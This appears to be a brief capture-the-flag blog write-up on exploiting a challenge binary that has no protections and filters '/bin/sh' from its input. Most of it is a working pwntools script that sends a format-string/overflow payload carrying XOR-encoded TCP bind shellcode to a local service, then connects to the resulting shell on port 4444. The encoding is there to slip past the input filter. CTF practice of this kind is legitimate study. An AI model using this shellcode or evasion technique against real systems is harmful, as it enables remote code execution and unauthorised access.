Blog
This binary too had no protection .. it had a format string vulnerability so i just overflowed the buffer also the buffer was locate in bss section ..
only thing on our way to pwn the binary is it was filtering our input and checking if we have /bin/sh or something like it .. so the solution was too
use XOR encoded Tcp_bind shellcode
from pwn import *
shellcode="\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34\x1e\x88\x03\x43\x66\x49\x75\xf5\xeb\x05\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f\x45\x2f\xd7\x4f\x74\x1f\x74\x1c\x97\xff\xd3\x9e\x97\xd8\x2f\xcc\x4c\x78\x76\x0f\x42\x78\x76\x1c\x1e\x97\xff\x74\x0e\x4f\x4e\x97\xff\xad\x1c\x74\x78\x46\xd3\x9e\xae\x78\xad\x1a\xd3\x9e\x4c\x48\x97\xff\x5d\x74\x78\x46\xd3\x9e\x97\xdd\x74\x1c\x47\x74\x21\x46\xd3\x9e\xfc\xe7\x74\x21\x46\xd3\x9e\x2f\xcc\x4c\x76\x70\x31\x6d\x76\x76\x31\x31\x7c\x77\x97\xfd\x4c\x78\x76\x33\x77\x97\xff\x4c\x4f\x4d\x97\xff\x74\x15\x46\xd3\x9e\x74\x1f\x46\x2f\xc5\xd3\x9e"
print "[+] Len of payload=%d"%len(shellcode)
payload='\xeb'+chr(11)+"\x90"*2+"%524u"+pack(0x804b120)+shellcode
r=remote('127.0.0.1',23456)
msg=r.recvuntil(':')
print msg
print "[+] Len of payload=%d"%len(payload)
r.send(payload+"\n")
r.close()
s=remote('127.0.0.1',4444)
s.interactive()